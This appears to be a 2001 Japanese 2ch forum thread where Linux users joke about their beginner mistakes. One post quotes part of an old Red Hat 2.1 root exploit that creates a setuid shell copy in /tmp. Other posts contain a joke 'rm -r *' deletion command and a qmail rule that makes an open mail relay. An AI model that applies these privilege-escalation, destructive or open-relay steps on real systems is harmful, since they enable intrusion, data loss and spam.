探検


自分の厨房さをさりげなく出してみよう

1厨房
垢版 |
NGNG
%vi hage
:%s/^M$//g
:wq

気分はハカー(プ
2login:Penguin
垢版 |
NGNG
$ emacs crlf2lf
#!/bin/sh
if [ ! -x /usr/bin/nkf ]; then
echo "crlf2lf: Please install nkf"
exit 1
fi

if [ -z $1 ]; then
echo "usage: crlf2lf <filename>" >&2
exit 1
fi

if [ -f $1 ]; then
nkf -Lu $1 > $1.nkftemp
mv -f $1.nkftemp $1
exit 0
else
echo "crlf2lf: No such file"
exit 1
fi

C-x C-c
$ chmod 700 crlf2lf

気分はプログラマー(プ
NGNG
すみません。消防なのでどこが面白いのか分かりません。
NGNG
rm ーr *、*
NGNG
>>4
イイ!
NGNG
kill -KILL >>1 >>2
7login:Penguin
垢版 |
NGNG
>>2
悦に入っていたところにqkcを知ったっていうオチ...?
8Anonymous
垢版 |
NGNG
rootを奪取してみよう。

echo --- gain root on Redhat Linux 2.1
echo --- Cheking system vulnerability
if test -u /usr/lib/games/abuse/abuse.console
then
echo --- System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/undrv
#!/bin/sh
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/aduser
_EOF_
chmod +x /tmp/undrv
PATH=/tmp
echo --- Executing Abuse
・・・以下略

しまった! RH 2.1用書いちまった!
NGNG
>>7
そう。
既に存在するものをわざわざ書いてしまった上に、自分で書いたもののほうが低機能だったと言うオチです。
NGNG
kill -9 6
11login:Penguin
垢版 |
NGNG
>>8
スマソ
5.2から始めた厨房には理解できませぬ。
12Anonymous
垢版 |
NGNG
>>11
RH 2.1には SGID/SUIDの深刻なセキュリティホールがあった
/usr/lib/games/aduse/aduse.console がそれである
上記のファイルを使えば60行程度のスクリプトでrootを奪取できるモノだった
>>8はその一部じゃ、現在ではもちろん通用しないがの
NGNG
自作機にフロッペをインスツールしてみました。でも認識しません
ディスクトップに何も出てこないのです

マウンターを起動してみましたが、使い方がよくわかりませんでした
14厨房
垢版 |
NGNG
ここの低能共は Win2k + Cygwin の最強さをわかってないらしい。(プ
「Winは糞」という馬鹿のひとつ覚えはもう聞きあきたね(プププ
結局のところ自分の無知まるだしでLinuxを使って賢いフリ(ププププププ

内心: われながら論理的で非の打ちどころのない文章だな (フ
15login:Penguin
垢版 |
NGNG
Win2kで安定して動く、高機能なMP3プレーヤ知りませんか。
WinAmp入れましたが、2時間で落ちてしまい、xmmsはいう
までもなく、Macのitunesよりも遥かに劣る安定度しかあり
ません。
NGNG
ここの低能様は MacOS + MacMiNT の最強さをわかってないらしー
17login:Penguin
垢版 |
NGNG
MacMiNTって何?
あ、関係ないけどlinuxって文字選択して中ボタン押すだけでコピペ出来るんだ。
今まで気づかなかった。我ながら見事な消防ぶり(自画自賛)
NGNG
>>17 MacMiNT
Mac用 cygwinみたいなものらしいです。
19login:Penguin
垢版 |
NGNG
家のマシンは.rpmファイルをリアルプレーヤで開こうとします。
20login:Penguin
垢版 |
NGNG
startx
21login:Penguin
垢版 |
NGNG
xinit
NGNG
FreeBSD で wheel グループでないと su できないのがわからなくて慌てたた。
NGNG
いっつもLIだったのが
010101010101010101…
と症状が変わって嬉しかった
24login:Penguin
垢版 |
NGNG
NICの2枚挿しがしたいんですけど・・・。
25login:Penguin
垢版 |
NGNG
bind9.1.xになってからnamedってゆープロセスがたくさん立って困ってるんです。
killした方がよかですか?
26login:Penguin
垢版 |
NGNG
FreeBSDでディレクトリのchmodするときって、chmod go+rx /home/hogehoge/
みたいにケツのスラッシュが必ず要るのね。
27login:Penguin
垢版 |
NGNG
管理者にvim6入れて、と言おうと思ったけど
小心者で言えなかったので、とりあえずhomeに入れた私は
厨房認定でしょうか?
28login:Penguin
垢版 |
NGNG
Linuxのリソ−スのほとんどをエロに
当てている僕は厨房ですね。
NGNG
>>28
いや、むしろ漢だ。
30login:Penguin
垢版 |
NGNG
MIDI ファイルを解析&作成するためだけに、16進ダンププログ
ラムと、そのダンプリストからバイナリファイルを作るプログ
ラムを作ってしまった。バイナリエディタ拾ってくればいいも
のを....
しかも、気が付いたら dehex が n進数から文字列、コメント
まで対応した妙なものになっていた.... 厨でしょ。
31login:Penguin
垢版 |
NGNG
「西村理香」とか「プチトマト」という名前のディレクトリがある。
厨房ですね。
32login:Penguin
垢版 |
NGNG
>>31

炉浬はあまりにアトミックですよ。ウラン柄杓ですくって掻き回してるみたい
でヤバいですよ。っていうか、少年は大人に惹かれるものですよ。
寝小便してそうなガキは興味無しですよ。[Kumiko_Takeda]とか
[Kanoh_Sisters]というディレクトリならあります。
NGNG
つーか、工口を格納するディレクトリはとりあえず
. (ドット)を先頭に付けておくべきである。
NGNG
>>33
".. "(ドットドットスペース)みたいなディレクトリなら、
もっと良いかも。
35login:Penguin
垢版 |
NGNG
つうか普通、やばいのは不可視コード使うだろ。
NGNG
過去に回答があったぞ
/mntに置いといて、使わないときは何かマウントしとけば完璧
37login:Penguin
垢版 |
NGNG
>>30
それ便利かも!

と、さりげなく厨房発言。
38login:Penguin
垢版 |
NGNG
ダンプって何だよダンプって
ダンプは車だろ、アホな事書いてねーで学業or仕事しろや

# なかなか痛くて厨(wara
NGNG
あんたセンス良すぎ。
NGNG
は〜ぁ。これだから何も分かってない厨房は…
ダンブといえば松本に決まってるだろうが。
NGNG
あん?
もしかして dumpって書いてダンプて
読むとでも?
NGNG
>>41
"ドゥンプ"とでも読みたいのか?
4330
垢版 |
NGNG
40まではセンス良かったのに、、、
意味不明になっちゃったのでさげ。
NGNG
FDクローン便利スギ!
45荒井厨
垢版 |
NGNG
LINUXにはPSというフリーソフトがあるが、何故PSとい
う名称なのか?

それはLINUXで動作しているタスクの事をpsと呼ぶからで
ある。*BSDではprocessと呼ぶそうであるが、これは
歴史的な経緯でそう呼ばれているだけに過ぎず、実はこれは誤り
である。

# (フッ…決まったな)
# なんだバカヤロ
46login:Penguin
垢版 |
NGNG
平謝りである
NGNG
>>45
>タスク
これの説明をしてくれ
NGNG
芸は身を
NGNG
alias dir ls
NGNG
Qmailはセキュリティに強いですが、強すぎてそのままではメールを出せません。
これで悩んだ諸兄!俺は見つけました!(優越感ゾクゾク)
以下のようにしましょう!!

* tcpserver経由でqmail.smtpを呼ぶ場合のコマンドライン例*
# /usr/local/bin/tcpserver -v -u 1007 -g 101 -x /etc/tcp.smtp.cdb 0 smtp /var/qmail/bin/qmail-smtp

* 上記tcp.smtp.cdbの作り方*

# tcprules tcp.smtp.cdb tcp.tmp < tcp.smtp.src

* tcp.smtp.srcの内容 *
------------------------
allow,RELAYCLIENT=""
------------------------

はい!これでQmailでメールが出せます!わははははっ!!
あぶないsendmailなど捨てて、真のセキュアで高速なMTAの実力を味わいましょう!
51sendmailer
垢版 |
NGNG
>>50
私のような厨房には意味がわかりません。
解説求む。
NGNG
タスクスケジューラ?
NGNG
>>1->>50
僕は、大タコな貧乏中年@hageなので、誰か優しく教えて下さい。
できれば、優しいお姉さんを希望します。
あ、僕的には、若い眼鏡美人が好みです。

希望した答えでないと、僕、暴れちゃうかも知れません。
5452
垢版 |
NGNG
>>53

私は含まれないと言うことですね。残念...
NGNG
>>53
トリップつけるほどその名前に誇りを持ってたの?
NGNG
>>54
いや〜
眼鏡かけていなくてもイイよ。。。

>>55
あの〜
僕、ドキュソなので、トリップって何なの〜ワカラナイーです。。。バタバタ
期待した答えが返ってこないと、焼き鳥にしちゃうぞ〜
NGNG
>>56

焼き鳥は好物です。
是非御馳走して下さい。
NGNG
>>50
ネタにマジレスするのもアレなんだが、それだとやっぱりメールは出せないぞ。

$ cat env.sh
#!/bin/sh
set
↑こういうシェルスクリプトを作って、

$ tcpserver -x tcp.smtp.cdb 127.0.0.1 10000 /somewhere/env.sh
で起動して、
$ telnet localhost 10000
を実行したときに、RELAYCLIENT がどうなるか見てみるとよい。

ってゆーか、↓こうやっちゃったんだよね。コロン重要。

:allow,RELAYCLIENT=""

これだと open relay になって spammer がわらわらやってくる。>>51
NGNG
OS/400の同人誌を(以下省略)
60login:Penguin
垢版 |
NGNG
どこが厨房なんだ?

ある意味、漢のように思われ。>>59
61basashi
垢版 |
NGNG
厨房ってなんですか?
はじめて来たんですけど意味が分からない言葉が多くって。
62login:Penguin
垢版 |
NGNG
>>61
おまえのことだよ。ププ
63basashi
垢版 |
NGNG
了解!
NGNG
>>61
料理をするところ。詳しくは広辞苑を見よ。
65basashi
垢版 |
NGNG
突然odnから[email protected] (TOMATO)
のmailがとんできました。そのあといきなりipchains
がすべてDENYになってしまいました。
やられちゃったみたいです。みなさんすごい人達なんです
ね?おてやわらかに。
NGNG
>>65
それは良かったですね
67login:Penguin
垢版 |
NGNG
25 17 * * 5 echo 'kernel panic: hogehoge'
68login:Penguin
垢版 |
01/10/08 19:42ID:JLpukcbo
ここを使うか・・・・・
01/10/09 07:48ID:h3S4OjCg
>>68
何に使うんだろう・・・
70login:Penguin
垢版 |
01/10/10 00:00ID:aW85.XPI
ねえねえお隣さん。
お醤油貸してくださいな。
01/10/10 02:33ID:v68sQ4g.
人名は出したくないが悪寒の走る68だな
72login:Penguin
垢版 |
01/10/10 10:03ID:xmiyC5.g
すいません、ASCII コードって何メートルですか?
73login:Penguin
垢版 |
01/10/10 10:22ID:0k9B.iRQ
>>72
0x00 - 0xFF まであるので 256 メートルです。
01/10/11 18:49ID:nYbu3HWM
赤衰勢出てこんかいゴルァ!!
01/10/12 01:26ID:kGY3seQE
短気は損気。
76login:Penguin
垢版 |
01/10/16 14:45ID:VcJ2CudT
わたしは自分のことをハッカーだと思い込んでいます。
77login:Penguin
垢版 |
01/10/17 00:29ID:vNNhLtWx
このスレ下がんないな。なぜだろ?
01/10/17 00:40ID:wc8hdLQA
Xというのは、Xboxのことですか!?
79login:Penguin
垢版 |
01/10/17 00:44ID:StwVUYqz
>>78
違うよ?
LinuxとかUnixのXだよ(まじれす)
01/10/17 00:50ID:14B4A2r8
>>77
お前のせいだろ!
8180
垢版 |
01/10/17 00:51ID:14B4A2r8
自分にレスしてしまった。
01/10/17 00:52ID:9nVcm6i5
>>78
そんなわけないでしょ。なに逝ってるんですか。
X ってのはマンガですよ、マンガ。
01/10/17 00:53ID:hkx1Lpx/
>>82
それ持ってる
面白いよね
01/10/17 01:16ID:StwVUYqz
>>79ー80
ジサクジエンカコワルイ
85login:Penguin
垢版 |
01/10/17 01:37ID:StwVUYqz
>>46
板違い
01/10/17 01:38ID:vNNhLtWx
あげてもた
01/10/17 16:31ID:W/jNXJLH
X…
それは大変エッチなもの。
01/10/18 02:51ID:ppRoBIag
皆さん初めまして。私はLinux初心者のlogin:Penguin
と申します。
実は今、レポートとしてちょっとしたCGIを作っているのですが
どうやって作ったらいいか解らずに困っています。
簡単なMLっぽいやつなのですが・・・
提出期限は今週末です。
本当に困っています。
スキルをお持ちの皆様、ご指導宜しくお願いします。

# ML取ってると、こんな厨メール来るよな
01/10/18 13:35ID:xUr6OdWE
とりあえず見積もり送ってやれよ
01/10/22 19:07ID:eYLQ+z8U
>>89
その前に要求分析が必要と思われ

でも、かなりの金額書いてDM送ってやるのも面白いかも(w
01/10/29 19:44ID:yYBIcxJQ
sage
92login:Penguin
垢版 |
01/11/22 19:55ID:5UUIu72v
WindowsXPの尻持ってる人いますか?
93rm -rf *.*
垢版 |
01/11/25 17:33ID:pr4Bq87Z
WindowsXPはどこにありますか。
できればrpmがいいです。急いでます。
94login:Penguin
垢版 |
01/12/13 12:51ID:vBckb3pG
age
95login:Penguin
垢版 |
01/12/13 13:02ID:gyGl78yX
X Windows

全角もミソ。
96login:Penguin
垢版 |
01/12/14 01:29ID:8M/QfNFt
私のパソコンはLinuxのCDROMを入れてもアイコンが出ません。
CDROMの中身は開けなかったり開けるものもありますが英語で良くわかりま
せん。
でもハッカーになりたいです。
どうしたら良いでしょうか。
初歩的質問でもうしわけありません。
01/12/14 01:45ID:31HRYmQS
>>95
う〜ん、まだまだ。

「X Windows」

全角半角ごちゃ混ぜ。これが厨の書き方。

# どうすりゃこんな変な書き方になるんだ? マヂ厨の方、解説キボーン
01/12/14 02:08ID:Y8sZiyKq
>>97=8
スレ違い
01/12/14 02:45ID:t7OGJSzh
お前らの3CGソフト上げろゴルァ!
01/12/14 12:36ID:9/x3KIT8
100get
01/12/14 15:09ID:gMR/+tVT
Mayaあげたやるょ
レスを投稿する


ニューススポーツなんでも実況